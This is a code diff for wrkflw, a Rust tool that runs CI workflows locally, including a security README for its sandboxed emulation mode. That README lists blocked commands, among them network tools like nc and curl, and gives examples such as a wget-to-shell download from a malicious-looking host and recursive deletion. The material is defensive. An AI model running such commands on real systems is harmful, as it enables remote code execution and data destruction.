|
||||
// Convert each GitLab job to a GitHub Actions job
|
||||
for (job_name, gitlab_job) in &pipeline.jobs {
|
||||
// Skip template jobs
|
||||
if let Some(true) = gitlab_job.template {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Create a new job
|
||||
let mut job = workflow::Job {
|
||||
runs_on: Some(vec!["ubuntu-latest".to_string()]), // Default runner
|
||||
needs: None,
|
||||
steps: Vec::new(),
|
||||
env: HashMap::new(),
|
||||
matrix: None,
|
||||
services: HashMap::new(),
|
||||
if_condition: None,
|
||||
outputs: None,
|
||||
permissions: None,
|
||||
uses: None,
|
||||
with: None,
|
||||
secrets: None,
|
||||
};
|
||||
|
||||
// Add job-specific environment variables
|
||||
if let Some(variables) = &gitlab_job.variables {
|
||||
job.env.extend(variables.clone());
|
||||
}
|
||||
|
||||
// Add global variables if they exist
|
||||
if let Some(variables) = &pipeline.variables {
|
||||
// Only add if not already defined at job level
|
||||
for (key, value) in variables {
|
||||
job.env.entry(key.clone()).or_insert_with(|| value.clone());
|
||||
}
|
||||
}
|
||||
|
||||
// Convert before_script to steps if it exists
|
||||
if let Some(before_script) = &gitlab_job.before_script {
|
||||
for (i, cmd) in before_script.iter().enumerate() {
|
||||
let step = workflow::Step {
|
||||
name: Some(format!("Before script {}", i + 1)),
|
||||
uses: None,
|
||||
run: Some(cmd.clone()),
|
||||
with: None,
|
||||
env: HashMap::new(),
|
||||
continue_on_error: None,
|
||||
};
|
||||
job.steps.push(step);
|
||||
}
|
||||
}
|
||||
|
||||
// Convert main script to steps
|
||||
if let Some(script) = &gitlab_job.script {
|
||||
for (i, cmd) in script.iter().enumerate() {
|
||||
let step = workflow::Step {
|
||||
name: Some(format!("Run script line {}", i + 1)),
|
||||
uses: None,
|
||||
run: Some(cmd.clone()),
|
||||
with: None,
|
||||
env: HashMap::new(),
|
||||
continue_on_error: None,
|
||||
};
|
||||
job.steps.push(step);
|
||||
}
|
||||
}
|
||||
|
||||
// Convert after_script to steps if it exists
|
||||
if let Some(after_script) = &gitlab_job.after_script {
|
||||
for (i, cmd) in after_script.iter().enumerate() {
|
||||
let step = workflow::Step {
|
||||
name: Some(format!("After script {}", i + 1)),
|
||||
uses: None,
|
||||
run: Some(cmd.clone()),
|
||||
with: None,
|
||||
env: HashMap::new(),
|
||||
continue_on_error: Some(true), // After script should continue even if previous steps fail
|
||||
};
|
||||
job.steps.push(step);
|
||||
}
|
||||
}
|
||||
|
||||
// Add services if they exist
|
||||
if let Some(services) = &gitlab_job.services {
|
||||
for (i, service) in services.iter().enumerate() {
|
||||
let service_name = format!("service-{}", i);
|
||||
let service_image = match service {
|
||||
wrkflw_models::gitlab::Service::Simple(name) => name.clone(),
|
||||
wrkflw_models::gitlab::Service::Detailed { name, .. } => name.clone(),
|
||||
};
|
||||
|
||||
let service = workflow::Service {
|
||||
image: service_image,
|
||||
ports: None,
|
||||
env: HashMap::new(),
|
||||
volumes: None,
|
||||
options: None,
|
||||
};
|
||||
|
||||
job.services.insert(service_name, service);
|
||||
}
|
||||
}
|
||||
|
||||
// Add the job to the workflow
|
||||
workflow.jobs.insert(job_name.clone(), job);
|
||||
}
|
||||
|
||||
workflow
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
// use std::path::PathBuf; // unused
|
||||
use tempfile::NamedTempFile;
|
||||
|
||||
#[test]
|
||||
fn test_parse_simple_pipeline() {
|
||||
// Create a temporary file with a simple GitLab CI/CD pipeline
|
||||
let file = NamedTempFile::new().unwrap();
|
||||
let content = r#"
|
||||
stages:
|
||||
- build
|
||||
- test
|
||||
|
||||
build_job:
|
||||
stage: build
|
||||
script:
|
||||
- echo "Building..."
|
||||
- make build
|
||||
|
||||
test_job:
|
||||
stage: test
|
||||
script:
|
||||
- echo "Testing..."
|
||||
- make test
|
||||
"#;
|
||||
fs::write(&file, content).unwrap();
|
||||
|
||||
// Parse the pipeline
|
||||
let pipeline = parse_pipeline(&file.path()).unwrap();
|
||||
|
||||
// Validate basic structure
|
||||
assert_eq!(pipeline.stages.as_ref().unwrap().len(), 2);
|
||||
assert_eq!(pipeline.jobs.len(), 2);
|
||||
|
||||
// Check job contents
|
||||
let build_job = pipeline.jobs.get("build_job").unwrap();
|
||||
assert_eq!(build_job.stage.as_ref().unwrap(), "build");
|
||||
assert_eq!(build_job.script.as_ref().unwrap().len(), 2);
|
||||
|
||||
let test_job = pipeline.jobs.get("test_job").unwrap();
|
||||
assert_eq!(test_job.stage.as_ref().unwrap(), "test");
|
||||
assert_eq!(test_job.script.as_ref().unwrap().len(), 2);
|
||||
}
|
||||
}
|
||||
@@ -1,2 +1,5 @@
// parser crate

pub mod gitlab;
pub mod schema;
pub mod workflow;
crates/parser/src/schema.rs (new file, 111 lines)
@@ -0,0 +1,111 @@
|
||||
use jsonschema::JSONSchema;
|
||||
use serde_json::Value;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
|
||||
const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("github-workflow.json");
|
||||
const GITLAB_CI_SCHEMA: &str = include_str!("gitlab-ci.json");
|
||||
|
||||
#[derive(Debug, Clone, Copy)]
|
||||
pub enum SchemaType {
|
||||
GitHub,
|
||||
GitLab,
|
||||
}
|
||||
|
||||
pub struct SchemaValidator {
|
||||
github_schema: JSONSchema,
|
||||
gitlab_schema: JSONSchema,
|
||||
}
|
||||
|
||||
impl SchemaValidator {
|
||||
pub fn new() -> Result<Self, String> {
|
||||
let github_schema_json: Value = serde_json::from_str(GITHUB_WORKFLOW_SCHEMA)
|
||||
.map_err(|e| format!("Failed to parse GitHub workflow schema: {}", e))?;
|
||||
|
||||
let gitlab_schema_json: Value = serde_json::from_str(GITLAB_CI_SCHEMA)
|
||||
.map_err(|e| format!("Failed to parse GitLab CI schema: {}", e))?;
|
||||
|
||||
let github_schema = JSONSchema::compile(&github_schema_json)
|
||||
.map_err(|e| format!("Failed to compile GitHub JSON schema: {}", e))?;
|
||||
|
||||
let gitlab_schema = JSONSchema::compile(&gitlab_schema_json)
|
||||
.map_err(|e| format!("Failed to compile GitLab JSON schema: {}", e))?;
|
||||
|
||||
Ok(Self {
|
||||
github_schema,
|
||||
gitlab_schema,
|
||||
})
|
||||
}
|
||||
|
||||
pub fn validate_workflow(&self, workflow_path: &Path) -> Result<(), String> {
|
||||
// Determine the schema type based on the filename
|
||||
let schema_type = if workflow_path.file_name().is_some_and(|name| {
|
||||
let name_str = name.to_string_lossy();
|
||||
name_str.ends_with(".gitlab-ci.yml") || name_str.ends_with(".gitlab-ci.yaml")
|
||||
}) {
|
||||
SchemaType::GitLab
|
||||
} else {
|
||||
SchemaType::GitHub
|
||||
};
|
||||
|
||||
// Read the workflow file
|
||||
let content = fs::read_to_string(workflow_path)
|
||||
.map_err(|e| format!("Failed to read workflow file: {}", e))?;
|
||||
|
||||
// Parse YAML to JSON Value
|
||||
let workflow_json: Value = serde_yaml::from_str(&content)
|
||||
.map_err(|e| format!("Failed to parse workflow YAML: {}", e))?;
|
||||
|
||||
// Validate against the appropriate schema
|
||||
let validation_result = match schema_type {
|
||||
SchemaType::GitHub => self.github_schema.validate(&workflow_json),
|
||||
SchemaType::GitLab => self.gitlab_schema.validate(&workflow_json),
|
||||
};
|
||||
|
||||
// Handle validation errors
|
||||
if let Err(errors) = validation_result {
|
||||
let schema_name = match schema_type {
|
||||
SchemaType::GitHub => "GitHub workflow",
|
||||
SchemaType::GitLab => "GitLab CI",
|
||||
};
|
||||
let mut error_msg = format!("{} validation failed:\n", schema_name);
|
||||
for error in errors {
|
||||
error_msg.push_str(&format!("- {}\n", error));
|
||||
}
|
||||
return Err(error_msg);
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub fn validate_with_specific_schema(
|
||||
&self,
|
||||
content: &str,
|
||||
schema_type: SchemaType,
|
||||
) -> Result<(), String> {
|
||||
// Parse YAML to JSON Value
|
||||
let workflow_json: Value =
|
||||
serde_yaml::from_str(content).map_err(|e| format!("Failed to parse YAML: {}", e))?;
|
||||
|
||||
// Validate against the appropriate schema
|
||||
let validation_result = match schema_type {
|
||||
SchemaType::GitHub => self.github_schema.validate(&workflow_json),
|
||||
SchemaType::GitLab => self.gitlab_schema.validate(&workflow_json),
|
||||
};
|
||||
|
||||
// Handle validation errors
|
||||
if let Err(errors) = validation_result {
|
||||
let schema_name = match schema_type {
|
||||
SchemaType::GitHub => "GitHub workflow",
|
||||
SchemaType::GitLab => "GitLab CI",
|
||||
};
|
||||
let mut error_msg = format!("{} validation failed:\n", schema_name);
|
||||
for error in errors {
|
||||
error_msg.push_str(&format!("- {}\n", error));
|
||||
}
|
||||
return Err(error_msg);
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
@@ -1,11 +1,51 @@
|
||||
use crate::matrix::MatrixConfig;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde::{Deserialize, Deserializer, Serialize};
|
||||
use std::collections::HashMap;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
use wrkflw_matrix::MatrixConfig;
|
||||
|
||||
use super::schema::SchemaValidator;
|
||||
|
||||
// Custom deserializer for needs field that handles both string and array formats
|
||||
fn deserialize_needs<'de, D>(deserializer: D) -> Result<Option<Vec<String>>, D::Error>
|
||||
where
|
||||
D: Deserializer<'de>,
|
||||
{
|
||||
#[derive(Deserialize)]
|
||||
#[serde(untagged)]
|
||||
enum StringOrVec {
|
||||
String(String),
|
||||
Vec(Vec<String>),
|
||||
}
|
||||
|
||||
let value = Option::<StringOrVec>::deserialize(deserializer)?;
|
||||
match value {
|
||||
Some(StringOrVec::String(s)) => Ok(Some(vec![s])),
|
||||
Some(StringOrVec::Vec(v)) => Ok(Some(v)),
|
||||
None => Ok(None),
|
||||
}
|
||||
}
|
||||
|
||||
// Custom deserializer for runs-on field that handles both string and array formats
|
||||
fn deserialize_runs_on<'de, D>(deserializer: D) -> Result<Option<Vec<String>>, D::Error>
|
||||
where
|
||||
D: Deserializer<'de>,
|
||||
{
|
||||
#[derive(Deserialize)]
|
||||
#[serde(untagged)]
|
||||
enum StringOrVec {
|
||||
String(String),
|
||||
Vec(Vec<String>),
|
||||
}
|
||||
|
||||
let value = Option::<StringOrVec>::deserialize(deserializer)?;
|
||||
match value {
|
||||
Some(StringOrVec::String(s)) => Ok(Some(vec![s])),
|
||||
Some(StringOrVec::Vec(v)) => Ok(Some(v)),
|
||||
None => Ok(None),
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Debug, Deserialize, Serialize)]
|
||||
pub struct WorkflowDefinition {
|
||||
pub name: String,
|
||||
@@ -18,10 +58,11 @@ pub struct WorkflowDefinition {
|
||||
|
||||
#[derive(Debug, Deserialize, Serialize)]
|
||||
pub struct Job {
|
||||
#[serde(rename = "runs-on")]
|
||||
pub runs_on: String,
|
||||
#[serde(default)]
|
||||
#[serde(rename = "runs-on", default, deserialize_with = "deserialize_runs_on")]
|
||||
pub runs_on: Option<Vec<String>>,
|
||||
#[serde(default, deserialize_with = "deserialize_needs")]
|
||||
pub needs: Option<Vec<String>>,
|
||||
#[serde(default)]
|
||||
pub steps: Vec<Step>,
|
||||
#[serde(default)]
|
||||
pub env: HashMap<String, String>,
|
||||
@@ -29,6 +70,19 @@ pub struct Job {
|
||||
pub matrix: Option<MatrixConfig>,
|
||||
#[serde(default)]
|
||||
pub services: HashMap<String, Service>,
|
||||
#[serde(default, rename = "if")]
|
||||
pub if_condition: Option<String>,
|
||||
#[serde(default)]
|
||||
pub outputs: Option<HashMap<String, String>>,
|
||||
#[serde(default)]
|
||||
pub permissions: Option<HashMap<String, String>>,
|
||||
// Reusable workflow (job-level 'uses') support
|
||||
#[serde(default)]
|
||||
pub uses: Option<String>,
|
||||
#[serde(default)]
|
||||
pub with: Option<HashMap<String, String>>,
|
||||
#[serde(default)]
|
||||
pub secrets: Option<serde_yaml::Value>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Deserialize, Serialize)]
|
||||
crates/runtime/Cargo.toml (new file, 29 lines)
@@ -0,0 +1,29 @@
[package]
name = "wrkflw-runtime"
version.workspace = true
edition.workspace = true
description = "Runtime execution environment for wrkflw workflow engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true

[dependencies]
# Internal crates
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-logging = { path = "../logging", version = "0.7.0" }

# External dependencies
async-trait.workspace = true
once_cell = "1.19"
serde.workspace = true
serde_yaml.workspace = true
tempfile = "3.9"
tokio.workspace = true
futures = "0.3"
wrkflw-utils = { path = "../utils", version = "0.7.0" }
which = "4.4"
regex = "1.10"
thiserror = "1.0"
crates/runtime/README.md (new file, 13 lines)
@@ -0,0 +1,13 @@
## wrkflw-runtime

Runtime abstractions for executing steps in containers or emulation.

- Container management primitives used by the executor
- Emulation mode helpers (run on host without containers)

### Example

```rust
// This crate is primarily consumed by `wrkflw-executor`.
// Prefer using the executor API instead of calling runtime directly.
```
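As a rough illustration only, the sketch below assumes the sandbox types from `src/sandbox.rs` are reachable as `wrkflw_runtime::sandbox`; the command and working directory are placeholders:

```rust
use std::path::Path;
use wrkflw_runtime::sandbox::{Sandbox, SandboxConfig};

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    // Default config: command whitelist, no network access, 5-minute timeout.
    let sandbox = Sandbox::new(SandboxConfig::default())?;

    // Run a whitelisted command inside the sandbox workspace.
    let output = sandbox
        .execute_command(&["echo", "hello from the sandbox"], &[], Path::new("."))
        .await?;
    println!("exit {}: {}", output.exit_code, output.stdout);
    Ok(())
}
```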
crates/runtime/README_SECURITY.md (new file, 258 lines)
@@ -0,0 +1,258 @@
|
||||
# Security Features in wrkflw Runtime
|
||||
|
||||
This document describes the security features implemented in the wrkflw runtime, particularly the sandboxing capabilities for emulation mode.
|
||||
|
||||
## Overview
|
||||
|
||||
The wrkflw runtime provides multiple execution modes with varying levels of security:
|
||||
|
||||
1. **Docker Mode** - Uses Docker containers for isolation (recommended for production)
|
||||
2. **Podman Mode** - Uses Podman containers for isolation with rootless support
|
||||
3. **Secure Emulation Mode** - 🔒 **NEW**: Sandboxed execution on the host system
|
||||
4. **Emulation Mode** - ⚠️ **UNSAFE**: Direct execution on the host system (deprecated)
|
||||
|
||||
## Security Modes
|
||||
|
||||
### 🔒 Secure Emulation Mode (Recommended for Local Development)
|
||||
|
||||
The secure emulation mode provides comprehensive sandboxing to protect your system from potentially harmful commands while still allowing legitimate workflow operations.
|
||||
|
||||
#### Features
|
||||
|
||||
- **Command Validation**: Blocks dangerous commands like `rm -rf /`, `dd`, `sudo`, etc.
|
||||
- **Pattern Detection**: Uses regex patterns to detect dangerous command combinations
|
||||
- **Resource Limits**: Enforces CPU, memory, and execution time limits
|
||||
- **Filesystem Isolation**: Restricts file access to allowed paths only
|
||||
- **Environment Sanitization**: Filters dangerous environment variables
|
||||
- **Process Monitoring**: Tracks and limits spawned processes
|
||||
|
||||
#### Usage
|
||||
|
||||
```bash
|
||||
# Use secure emulation mode (recommended)
|
||||
wrkflw run --runtime secure-emulation .github/workflows/build.yml
|
||||
|
||||
# Or via TUI
|
||||
wrkflw tui --runtime secure-emulation
|
||||
```
|
||||
|
||||
#### Command Whitelist/Blacklist
|
||||
|
||||
**Allowed Commands (Safe):**
|
||||
- Basic utilities: `echo`, `cat`, `ls`, `grep`, `sed`, `awk`
|
||||
- Development tools: `cargo`, `npm`, `python`, `git`, `node`
|
||||
- Build tools: `make`, `cmake`, `javac`, `dotnet`
|
||||
|
||||
**Blocked Commands (Dangerous):**
|
||||
- System modification: `rm`, `dd`, `mkfs`, `mount`, `sudo`
|
||||
- Network tools: `wget`, `curl`, `ssh`, `nc`
|
||||
- Process control: `kill`, `killall`, `systemctl`
|
||||
|
||||
#### Resource Limits
|
||||
|
||||
```rust
|
||||
// Default configuration
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(300), // 5 minutes
|
||||
max_memory_mb: 512, // 512 MB
|
||||
max_cpu_percent: 80, // 80% CPU
|
||||
max_processes: 10, // Max 10 processes
|
||||
allow_network: false, // No network access
|
||||
strict_mode: true, // Whitelist-only mode
|
||||
}
|
||||
```
|
||||
|
||||
### ⚠️ Legacy Emulation Mode (Unsafe)
|
||||
|
||||
The original emulation mode executes commands directly on the host system without any sandboxing. **This mode is deprecated and should only be used for trusted workflows.**
|
||||
|
||||
```bash
|
||||
# Legacy unsafe mode (not recommended)
|
||||
wrkflw run --runtime emulation .github/workflows/build.yml
|
||||
```
|
||||
|
||||
## Example: Blocked vs Allowed Commands
|
||||
|
||||
### ❌ Blocked Commands
|
||||
|
||||
```yaml
|
||||
# This workflow will be blocked in secure emulation mode
|
||||
steps:
|
||||
- name: Dangerous command
|
||||
run: rm -rf /tmp/* # BLOCKED: Dangerous file deletion
|
||||
|
||||
- name: System modification
|
||||
run: sudo apt-get install package # BLOCKED: sudo usage
|
||||
|
||||
- name: Network access
|
||||
run: wget https://malicious-site.com/script.sh | sh # BLOCKED: wget + shell execution
|
||||
```
|
||||
|
||||
### ✅ Allowed Commands
|
||||
|
||||
```yaml
|
||||
# This workflow will run successfully in secure emulation mode
|
||||
steps:
|
||||
- name: Build project
|
||||
run: cargo build --release # ALLOWED: Development tool
|
||||
|
||||
- name: Run tests
|
||||
run: cargo test # ALLOWED: Testing
|
||||
|
||||
- name: List files
|
||||
run: ls -la target/ # ALLOWED: Safe file listing
|
||||
|
||||
- name: Format code
|
||||
run: cargo fmt --check # ALLOWED: Code formatting
|
||||
```
|
||||
|
||||
## Security Warnings and Messages
|
||||
|
||||
When dangerous commands are detected, wrkflw provides clear security messages:
|
||||
|
||||
```
|
||||
🚫 SECURITY BLOCK: Command 'rm' is not allowed in secure emulation mode.
|
||||
This command was blocked for security reasons.
|
||||
If you need to run this command, please use Docker or Podman mode instead.
|
||||
```
|
||||
|
||||
```
|
||||
🚫 SECURITY BLOCK: Dangerous command pattern detected: 'rm -rf /'.
|
||||
This command was blocked because it matches a known dangerous pattern.
|
||||
Please review your workflow for potentially harmful commands.
|
||||
```
|
||||
|
||||
## Configuration Examples
|
||||
|
||||
### Workflow-Friendly Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::create_workflow_sandbox_config;
|
||||
|
||||
let config = create_workflow_sandbox_config();
|
||||
// - Allows network access for package downloads
|
||||
// - Higher resource limits for CI/CD workloads
|
||||
// - Less strict mode for development flexibility
|
||||
```
|
||||
|
||||
### Strict Security Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::create_strict_sandbox_config;
|
||||
|
||||
let config = create_strict_sandbox_config();
|
||||
// - No network access
|
||||
// - Very limited command set
|
||||
// - Low resource limits
|
||||
// - Strict whitelist-only mode
|
||||
```
|
||||
|
||||
### Custom Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::{SandboxConfig, Sandbox};
|
||||
use std::collections::HashSet;
|
||||
use std::path::PathBuf;
use std::time::Duration;
|
||||
|
||||
let mut config = SandboxConfig::default();
|
||||
|
||||
// Custom allowed commands
|
||||
config.allowed_commands = ["echo", "ls", "cargo"]
|
||||
.iter()
|
||||
.map(|s| s.to_string())
|
||||
.collect();
|
||||
|
||||
// Custom resource limits
|
||||
config.max_execution_time = Duration::from_secs(60);
|
||||
config.max_memory_mb = 256;
|
||||
|
||||
// Custom allowed paths
|
||||
config.allowed_write_paths.insert(PathBuf::from("./target"));
|
||||
config.allowed_read_paths.insert(PathBuf::from("./src"));
|
||||
|
||||
let sandbox = Sandbox::new(config)?;
|
||||
```
|
||||
|
||||
## Migration Guide
|
||||
|
||||
### From Unsafe Emulation to Secure Emulation
|
||||
|
||||
1. **Change Runtime Flag**:
|
||||
```bash
|
||||
# Old (unsafe)
|
||||
wrkflw run --runtime emulation workflow.yml
|
||||
|
||||
# New (secure)
|
||||
wrkflw run --runtime secure-emulation workflow.yml
|
||||
```
|
||||
|
||||
2. **Review Workflow Commands**: Check for any commands that might be blocked and adjust if necessary.
|
||||
|
||||
3. **Handle Security Blocks**: If legitimate commands are blocked, consider:
|
||||
- Using Docker/Podman mode for those specific workflows
|
||||
- Modifying the workflow to use allowed alternatives
|
||||
- Creating a custom sandbox configuration
|
||||
|
||||
### When to Use Each Mode
|
||||
|
||||
| Use Case | Recommended Mode | Reason |
|
||||
|----------|------------------|---------|
|
||||
| Local development | Secure Emulation | Good balance of security and convenience |
|
||||
| Untrusted workflows | Docker/Podman | Maximum isolation |
|
||||
| CI/CD pipelines | Docker/Podman | Consistent, reproducible environment |
|
||||
| Testing workflows | Secure Emulation | Fast execution with safety |
|
||||
| Trusted internal workflows | Secure Emulation | Sufficient security for known-safe code |
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Command Blocked Error
|
||||
|
||||
If you encounter a security block:
|
||||
|
||||
1. **Check if the command is necessary**: Can you achieve the same result with an allowed command?
|
||||
2. **Use container mode**: Switch to Docker or Podman mode for unrestricted execution
|
||||
3. **Modify the workflow**: Use safer alternatives where possible
|
||||
|
||||
### Resource Limit Exceeded
|
||||
|
||||
If your workflow hits resource limits:
|
||||
|
||||
1. **Optimize the workflow**: Reduce resource usage where possible
|
||||
2. **Use custom configuration**: Increase limits for specific use cases
|
||||
3. **Use container mode**: For resource-intensive workflows
|
||||
|
||||
### Path Access Denied
|
||||
|
||||
If file access is denied:
|
||||
|
||||
1. **Check allowed paths**: Ensure your workflow only accesses permitted directories
|
||||
2. **Use relative paths**: Work within the project directory
|
||||
3. **Use container mode**: For workflows requiring system-wide file access
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Default to Secure Mode**: Use secure emulation mode by default for local development
|
||||
2. **Test Workflows**: Always test workflows in secure mode before deploying
|
||||
3. **Review Security Messages**: Pay attention to security blocks and warnings
|
||||
4. **Use Containers for Production**: Use Docker/Podman for production deployments
|
||||
5. **Regular Updates**: Keep wrkflw updated for the latest security improvements
|
||||
|
||||
## Security Considerations
|
||||
|
||||
- Secure emulation mode is designed to prevent **accidental** harmful commands, not to stop **determined** attackers
|
||||
- For maximum security with untrusted code, always use container modes
|
||||
- The sandbox is most effective against script errors and typos that could damage your system
|
||||
- Always review workflows from untrusted sources before execution
|
||||
|
||||
## Contributing Security Improvements
|
||||
|
||||
If you find security issues or have suggestions for improvements:
|
||||
|
||||
1. **Report Security Issues**: Use responsible disclosure for security vulnerabilities
|
||||
2. **Suggest Command Patterns**: Help improve dangerous pattern detection
|
||||
3. **Test Edge Cases**: Help us identify bypass techniques
|
||||
4. **Documentation**: Improve security documentation and examples
|
||||
|
||||
---
|
||||
|
||||
For more information, see the main [README.md](../../README.md) and [Security Policy](../../SECURITY.md).
|
||||
@@ -24,6 +24,7 @@ pub trait ContainerRuntime {
|
||||
) -> Result<String, ContainerError>;
|
||||
}
|
||||
|
||||
#[derive(Debug)]
|
||||
pub struct ContainerOutput {
|
||||
pub stdout: String,
|
||||
pub stderr: String,
|
||||
@@ -1,5 +1,4 @@
|
||||
use crate::logging;
|
||||
use crate::runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use async_trait::async_trait;
|
||||
use once_cell::sync::Lazy;
|
||||
use std::collections::HashMap;
|
||||
@@ -8,6 +7,8 @@ use std::path::{Path, PathBuf};
|
||||
use std::process::Command;
|
||||
use std::sync::Mutex;
|
||||
use tempfile::TempDir;
|
||||
use which;
|
||||
use wrkflw_logging;
|
||||
|
||||
// Global collection of resources to clean up
|
||||
static EMULATION_WORKSPACES: Lazy<Mutex<Vec<PathBuf>>> = Lazy::new(|| Mutex::new(Vec::new()));
|
||||
@@ -160,36 +161,113 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
command_str.push_str(part);
|
||||
}
|
||||
|
||||
// Log the command being executed
|
||||
logging::info(&format!("Executing command in container: {}", command_str));
|
||||
// Log more detailed debugging information
|
||||
wrkflw_logging::info(&format!("Executing command in container: {}", command_str));
|
||||
wrkflw_logging::info(&format!("Working directory: {}", working_dir.display()));
|
||||
wrkflw_logging::info(&format!("Command length: {}", command.len()));
|
||||
|
||||
// Special handling for Rust/Cargo actions
|
||||
if command_str.contains("rust") || command_str.contains("cargo") {
|
||||
logging::debug(&format!("Executing Rust command: {}", command_str));
|
||||
if command.is_empty() {
|
||||
return Err(ContainerError::ContainerExecution(
|
||||
"Empty command array".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
let mut cmd = Command::new("cargo");
|
||||
let parts = command_str.split_whitespace().collect::<Vec<&str>>();
|
||||
// Print each command part separately for debugging
|
||||
for (i, part) in command.iter().enumerate() {
|
||||
wrkflw_logging::info(&format!("Command part {}: '{}'", i, part));
|
||||
}
|
||||
|
||||
let current_dir = working_dir.to_str().unwrap_or(".");
|
||||
cmd.current_dir(current_dir);
|
||||
// Log environment variables
|
||||
wrkflw_logging::info("Environment variables:");
|
||||
for (key, value) in env_vars {
|
||||
wrkflw_logging::info(&format!(" {}={}", key, value));
|
||||
}
|
||||
|
||||
// Find actual working directory - determine if we should use the current directory instead
|
||||
let actual_working_dir: PathBuf = if !working_dir.exists() {
|
||||
// Look for GITHUB_WORKSPACE or CI_PROJECT_DIR in env_vars
|
||||
let mut workspace_path = None;
|
||||
for (key, value) in env_vars {
|
||||
if *key == "GITHUB_WORKSPACE" || *key == "CI_PROJECT_DIR" {
|
||||
workspace_path = Some(PathBuf::from(value));
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
// If found, use that as the working directory
|
||||
if let Some(path) = workspace_path {
|
||||
if path.exists() {
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using environment-defined workspace: {}",
|
||||
path.display()
|
||||
));
|
||||
path
|
||||
} else {
|
||||
// Fallback to current directory
|
||||
let current_dir =
|
||||
std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using current directory: {}",
|
||||
current_dir.display()
|
||||
));
|
||||
current_dir
|
||||
}
|
||||
} else {
|
||||
// Fallback to current directory
|
||||
let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using current directory: {}",
|
||||
current_dir.display()
|
||||
));
|
||||
current_dir
|
||||
}
|
||||
} else {
|
||||
working_dir.to_path_buf()
|
||||
};
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using actual working directory: {}",
|
||||
actual_working_dir.display()
|
||||
));
|
||||
|
||||
// Check if path contains the command (for shell script execution)
|
||||
let command_path = which::which(command[0]);
|
||||
match &command_path {
|
||||
Ok(path) => wrkflw_logging::info(&format!("Found command at: {}", path.display())),
|
||||
Err(e) => wrkflw_logging::error(&format!(
|
||||
"Command not found in PATH: {} - Error: {}",
|
||||
command[0], e
|
||||
)),
|
||||
}
|
||||
|
||||
// First, check if this is a simple shell command (like echo)
|
||||
if command_str.starts_with("echo ")
|
||||
|| command_str.starts_with("cp ")
|
||||
|| command_str.starts_with("mkdir ")
|
||||
|| command_str.starts_with("mv ")
|
||||
{
|
||||
wrkflw_logging::info("Executing as shell command");
|
||||
// Execute as a shell command
|
||||
let mut cmd = Command::new("sh");
|
||||
cmd.arg("-c");
|
||||
cmd.arg(&command_str);
|
||||
cmd.current_dir(&actual_working_dir);
|
||||
|
||||
// Add environment variables
|
||||
for (key, value) in env_vars {
|
||||
cmd.env(key, value);
|
||||
}
|
||||
|
||||
// Add command arguments
|
||||
if parts.len() > 1 {
|
||||
cmd.args(&parts[1..]);
|
||||
}
|
||||
|
||||
match cmd.output() {
|
||||
Ok(output_result) => {
|
||||
let exit_code = output_result.status.code().unwrap_or(-1);
|
||||
let output = String::from_utf8_lossy(&output_result.stdout).to_string();
|
||||
let error = String::from_utf8_lossy(&output_result.stderr).to_string();
|
||||
|
||||
logging::debug(&format!("Command exit code: {}", exit_code));
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Shell command completed with exit code: {}",
|
||||
exit_code
|
||||
));
|
||||
|
||||
if exit_code != 0 {
|
||||
let mut error_details = format!(
|
||||
@@ -200,7 +278,94 @@ impl ContainerRuntime for EmulationRuntime {
|
||||
// Add environment variables to error details
|
||||
error_details.push_str("\n\nEnvironment variables:\n");
|
||||
for (key, value) in env_vars {
|
||||
if key.starts_with("GITHUB_") || key.starts_with("RUST") {
|
||||
if key.starts_with("GITHUB_") || key.starts_with("CI_") {
|
||||
error_details.push_str(&format!("{}={}\n", key, value));
|
||||
}
|
||||
}
|
||||
|
||||
return Err(ContainerError::ContainerExecution(error_details));
|
||||
}
|
||||
|
||||
return Ok(ContainerOutput {
|
||||
stdout: output,
|
||||
stderr: error,
|
||||
exit_code,
|
||||
});
|
||||
}
|
||||
Err(e) => {
|
||||
return Err(ContainerError::ContainerExecution(format!(
|
||||
"Failed to execute command: {}\nError: {}",
|
||||
command_str, e
|
||||
)));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Special handling for Rust/Cargo commands
|
||||
if command_str.starts_with("cargo ") || command_str.starts_with("rustup ") {
|
||||
let parts: Vec<&str> = command_str.split_whitespace().collect();
|
||||
if parts.is_empty() {
|
||||
return Err(ContainerError::ContainerExecution(
|
||||
"Empty command".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
let mut cmd = Command::new(parts[0]);
|
||||
|
||||
// Always use the current directory for cargo/rust commands rather than the temporary directory
|
||||
let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
|
||||
wrkflw_logging::info(&format!(
|
||||
"Using project directory for Rust command: {}",
|
||||
current_dir.display()
|
||||
));
|
||||
